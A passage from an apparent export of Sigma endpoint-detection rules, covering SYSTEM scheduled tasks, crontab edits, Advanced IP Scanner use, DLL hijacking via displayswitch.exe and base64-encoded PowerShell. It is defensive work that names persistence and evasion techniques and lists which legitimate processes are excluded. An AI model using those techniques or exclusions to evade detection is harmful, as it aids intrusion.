CommandLine|contains: '/ru*SYSTEM '\n\n exclusion_programfiles:\n CommandLine|contains:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_teamviewer:\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Users\\xxxxxx\\AppData\\Local\\Temp\\TeamViewer\\update.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Program Files (x86)\\TeamViewer\\Update\\update.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n CommandLine|contains|all:\n - '/Create /TN TVInstallRestore /TR'\n - '/RU SYSTEM /SC ONLOGON /F'\n\n exclusion_wapt:\n CommandLine|contains:\n - ' waptservice'\n - 'fullwaptupgrade'\n ParentImage|endswith: '\\cmd.exe'\n # c:\\Program Files (x86)\\wapt\\waptpython.exe / E:\\wapt\\waptpython.exe\n GrandparentImage|endswith:\n - '\\wapt\\waptpython.exe'\n - '\\wapt\\wapt-get.exe'\n\n exclusion_wapt_2:\n # schtasks /Create /SC ONCE /TN waptservicerestart /TR 'cmd.exe' /C net stop waptservice & net start waptservice /ST 08:07:31 /RU SYSTEM /F /V1 /Z\n CommandLine: 'schtasks /Create /SC ONCE /TN waptservicerestart /TR ?cmd.exe? /C net stop waptservice & net start waptservice *'\n\n exclusion_avira:\n CommandLine|contains:\n - ' AviraSystemSpeedupUpdate'\n - ' /TN Avira_Security_Update /TR '\n ParentImage|endswith:\n - '\\avira_speedup_setup_update.tmp'\n - '\\avira_spotlight_setup.tmp'\n GrandparentImage:\n - '?:\\ProgramData\\Avira\\SystemSpeedup\\Update\\avira_speedup_setup_update.exe'\n - '?:\\ProgramData\\Avira\\Security\\Temp\\avira_spotlight_setup.exe'\n # C:\\ProgramData\\Avira\\Security\\Update\\297fd79d-191e-4587-9348-4803c4e32b32\\avira_spotlight_setup.exe\n - '?:\\ProgramData\\Avira\\Security\\Update\\\\*\\avira_spotlight_setup.exe'\n\n exclusion_symantec:\n CommandLine|contains|all:\n - 'Symantec CleanWipe'\n - '\\CleanWipe.exe'\n ParentImage|endswith: '\\CleanWipe\\CleanWipe.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_mplnet:\n ParentImage: '?:\\MPLNET\\Inventory.exe'\n\n exclusion_bigfixenterprise:\n GrandparentImage: '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of a SYSTEM scheduled task by the system administrator or services\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5043ae9d-7660-4103-8092-bd964e56e775",
"rule_name": "System Scheduled Task Created",
"rule_description": "Detects the creation of a Scheduled Task that is set to run by the SYSTEM user.\nThe Task Scheduler Service in Windows is used to create and execute Scheduled Tasks, which can be used to launch programs, send emails or calling COM objects according to different triggers.\nScheduled Tasks can be used by attackers to set up persistence, having a Scheduled Task run as system could potentially indicate persistence and give an attacker the highest privileges on the local machine.\nIt is recommended to determine whether this is part of a persistence mechanism or normal endpoint/software behavior.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.705674Z",
"creation_date": "2026-03-23T11:45:34.612147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612154Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_etc_crontab_modified_linux.yml",
"content": "title: Crontab-Related Files Modified\nid: 5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc\ndescription: |\n Detects a suspicious attempt to modify \"/etc/crontab\" or other crontab-related files.\n These files contain scheduled tasks, usually run with root privileges, to help maintain the system.\n An attacker could use this files to add a malicious cron jobs for persistence.\n It is recommended to check the modified crontab file for malicious content as well as to look for other suspicious actions related to the process responsible for this modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/crontabs/*'\n - TargetPath:\n - '/etc/crontab'\n - '/etc/cron.*/*'\n - '/var/spool/cron/crontabs/*'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_cron:\n - ProcessImage|endswith: '/cron'\n - ProcessParentImage|endswith: '/cron'\n\n exclusion_crontab:\n - ProcessCommandLine: '/bin/bash /etc/cron.daily/system-crontab'\n - ProcessImage|endswith: '/crontab'\n - ProcessParentImage|endswith: '/crontab'\n\n exclusion_common:\n ProcessImage:\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/usr/bin/chown'\n - '/usr/bin/chgrp'\n - '/usr/bin/tar'\n\n exclusion_esmith:\n ProcessCommandLine|contains: '/e-smith/'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains: '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_quest_amptools:\n # /opt/quest/kace/bin/AMPTools\n # /data/quest/kace/bin/AMPTools\n - ProcessParentImage|endswith: '/quest/kace/bin/AMPTools'\n - ProcessGrandparentImage|endswith: '/quest/kace/bin/AMPTools'\n\n exclusion_quest_ampctl:\n ProcessParentCommandLine|startswith: '/bin/sh /etc/init.d/ampctl '\n\n exclusion_quest_koneacheckercrontab:\n ProcessCommandLine|contains:\n - '/etc/cron.d/koneacheckercrontab'\n - '/opt/quest/kace/bin/koneacheckercrontab'\n\n exclusion_eset:\n - ProcessImage|startswith: '/opt/eset/'\n - ProcessParentImage|startswith: '/opt/eset/'\n - ProcessParentCommandLine|startswith: '/bin/sh /opt/eset/efs/lib/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_kalilab:\n ProcessCommandLine|contains: '/var/www/kalilab/'\n\n exclusion_snap:\n ProcessImage|endswith: '/snap-update-ns'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5046eefb-f36f-4d3a-a86e-0e7c3ddfcccc",
"rule_name": "Crontab-Related Files Modified",
"rule_description": "Detects a suspicious attempt to modify \"/etc/crontab\" or other crontab-related files.\nThese files contain scheduled tasks, usually run with root privileges, to help maintain the system.\nAn attacker could use this files to add a malicious cron jobs for persistence.\nIt is recommended to check the modified crontab file for malicious content as well as to look for other suspicious actions related to the process responsible for this modification.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069811Z",
"creation_date": "2026-03-23T11:45:34.069813Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069817Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.advanced-ip-scanner.com/",
"https://www.bleepingcomputer.com/news/security/new-ymir-ransomware-partners-with-rustystealer-in-attacks/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://attack.mitre.org/techniques/T1595/001/"
],
"name": "t1595_001_advanced_ip_scanner.yml",
"content": "title: Advanced IP Scanner Executed from a Suspicious Location\nid: 5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43\ndescription: |\n Detects the execution of the Advanced IP Scanner tool in a suspicious location.\n Advanced IP Scanner is a network scanning and utilities tool used for various network-related tasks, including IP range scanning and data collection.\n Adversaries may use this tool to enumerate the network and aid in lateral movement.\n It is recommended to verify the legitimacy of its usage in the environment.\nreferences:\n - https://www.advanced-ip-scanner.com/\n - https://www.bleepingcomputer.com/news/security/new-ymir-ransomware-partners-with-rustystealer-in-attacks/\n - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n - https://attack.mitre.org/techniques/T1595/001/\ndate: 2025/11/03\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdvancedIPScanner\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Company: 'Famatech Corp.'\n Product: 'Advanced IP Scanner'\n\n filter_legitimate:\n Image:\n - '?:\\Program Files (x86)\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Program Files\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Advanced IP Scanner*\\advanced_ip_scanner.exe'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5048f6e6-e1a6-4d99-adae-e0fdb0ab4d43",
"rule_name": "Advanced IP Scanner Executed from a Suspicious Location",
"rule_description": "Detects the execution of the Advanced IP Scanner tool in a suspicious location.\nAdvanced IP Scanner is a network scanning and utilities tool used for various network-related tasks, including IP range scanning and data collection.\nAdversaries may use this tool to enumerate the network and aid in lateral movement.\nIt is recommended to verify the legitimacy of its usage in the environment.\n",
"rule_creation_date": "2025-11-03",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5060a37d-0510-4be7-b5ab-f0d8f36d2d3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599404Z",
"creation_date": "2026-03-23T11:45:34.599408Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599420Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_displayswitch.yml",
"content": "title: DLL Hijacking via displayswitch.exe\nid: 5060a37d-0510-4be7-b5ab-f0d8f36d2d3b\ndescription: |\n Detects potential Windows DLL Hijacking via displayswitch.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'displayswitch.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n - '\\policymanager.dll'\n - '\\UxTheme.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5060a37d-0510-4be7-b5ab-f0d8f36d2d3b",
"rule_name": "DLL Hijacking via displayswitch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via displayswitch.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "506a49d4-0c48-4c47-a6bb-9c4dbfec663c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622910Z",
"creation_date": "2026-03-23T11:45:34.622912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622917Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_base64_cmd.yml",
"content": "title: PowerShell Base64 Encoded Command Execution\nid: 506a49d4-0c48-4c47-a6bb-9c4dbfec663c\ndescription: |\n Detects the execution of PowerShell launching a base64-encoded command.\n Attackers may encode their PowerShell command to bypass security tools that perform pattern matching on suspicious scripts.\n It is recommended to check the encoded command for malicious content (for instance by selecting the base64 payload, right clicking and selecting 'Decode base64') and to analyze the execution context of the PowerShell binary.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/04/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1132.001\n - attack.defense_evasion\n - attack.t1027\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmd:\n CommandLine|contains:\n - ' -e '\n - ' -ec '\n - ' -en '\n - ' -enc '\n - ' -enco '\n - ' -encod '\n - ' -encode '\n - ' -encoded '\n - ' -encodedc '\n - ' -encodedco '\n - ' -encodedcom '\n - ' -encodedcomm '\n - ' -encodedcomma '\n - ' -encodedcomman '\n - ' -encodedcommand '\n - ' /e '\n - ' /ec '\n - ' /en '\n - ' /enc '\n - ' /enco '\n - ' /encod '\n - ' /encode '\n - ' /encoded '\n - ' /encodedc '\n - ' /encodedco '\n - ' /encodedcom '\n - ' /encodedcomm '\n - ' /encodedcomma '\n - ' /encodedcomman '\n - ' /encodedcommand '\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_sigilium:\n ParentImage|endswith:\n - ':\\Program Files\\sigilium-plugin\\app-*\\Sigilium Email Signatures.exe'\n - '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n GrandparentImage|endswith:\n - ':\\Program Files\\sigilium-plugin\\app-*\\Sigilium Email Signatures.exe'\n - '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n\n exclusion_azuread:\n ParentImage:\n - '?:\\Program Files\\Azure Ad Connect Health Adfs Agent\\Insights\\Microsoft.Identity.Health.Adfs.InsightsService.exe'\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Microsoft.Identity.Health.AgentV??.Service.exe'\n\n exclusion_vscode:\n ParentImage:\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n GrandparentImage:\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Program Files\\Microsoft VS Code\\Code.exe'\n\n exclusion_glpi:\n GrandparentImage: '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n # CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\perl\\bin' # too many different seen\n\n # https://www.chadduffey.com/2020/06/Ansible-PowerShell.html\n exclusion_ansible1:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\System32\\winrshost.exe'\n CommandLine:\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 